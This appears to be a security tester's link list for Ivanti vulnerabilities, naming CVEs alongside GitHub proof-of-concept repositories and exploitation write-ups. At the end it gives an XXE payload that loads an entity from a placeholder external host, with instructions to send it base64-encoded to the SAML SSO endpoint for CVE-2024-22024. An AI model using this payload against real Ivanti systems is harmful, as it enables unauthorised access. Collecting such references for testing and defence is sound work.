Ivanti

CVE-2025-22457

GitHub - sfewer-r7/CVE-2025-22457: PoC for CVE-2025-22457GitHub

Ivanti Endpoint Manager – Multiple Credential Coercion Vulnerabilities

Ivanti Endpoint Manager Vulnerabilities: Critical CVEs & Exploit DetailsHorizon3.ai

GitHub - horizon3ai/Ivanti-EPM-Coercion-Vulnerabilities: Proof of concept exploit for Ivanti EPM CVE-2024-13159 and othersGitHub

Authenticated RCE via OpenSSL CRLF Injection (CVE-2024-37404)

Ivanti Connect Secure - Authenticated RCE via OpenSSL CRLF Injection (CVE-2024-37404)

Ivanti Avalanche - CVE-2024-38653

Impacting versions 6.3.1, 6.4.0 (tested), 6.4.1, and 6.3.4.

POCs/CVE 2024-38653 at main · pwnfuzz/POCsGitHub

Ivanti Endpoint Manager Unauthorized XXE Exploit - CVE-2024-37397

POCs/CVE 2024-37397/CVE-2024-37397-Final-Full-Chain.py at main · pwnfuzz/POCsGitHub

Ivanti Pulse Secure - SSRF Vulnerability

GitHub - h4x0r-dz/CVE-2024-21893.py: CVE-2024-21893: SSRF Vulnerability in Ivanti Connect SecureGitHub

Ivanti Connect Secure

CVE-2025-0282 - RCE

GitHub - absholi7ly/CVE-2025-0282-Ivanti-exploit: CVE-2025-0282 is a critical vulnerability found in Ivanti Connect Secure, allowing Remote Command Execution (RCE) through a buffer overflow exploit.GitHub

GitHub - sfewer-r7/CVE-2025-0282: PoC for CVE-2025-0282: A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gatewaysGitHub

GitHub - watchtowrlabs/CVE-2025-0282: Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)GitHub

Do Secure-By-Design Pledges Come With Stickers? - Ivanti Connect Secure RCE (CVE-2025-0282)watchTowr Labs

Exploitation Walkthrough and Techniques - Ivanti Connect Secure RCE (CVE-2025-0282)watchTowr Labs

CVE-2024-22024

GitHub - 0dteam/CVE-2024-22024: Check for CVE-2024-22024 vulnerability in Ivanti Connect SecureGitHub

payload encoded base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to /dana-na/auth/saml-sso.cgi with SAMLRequest parm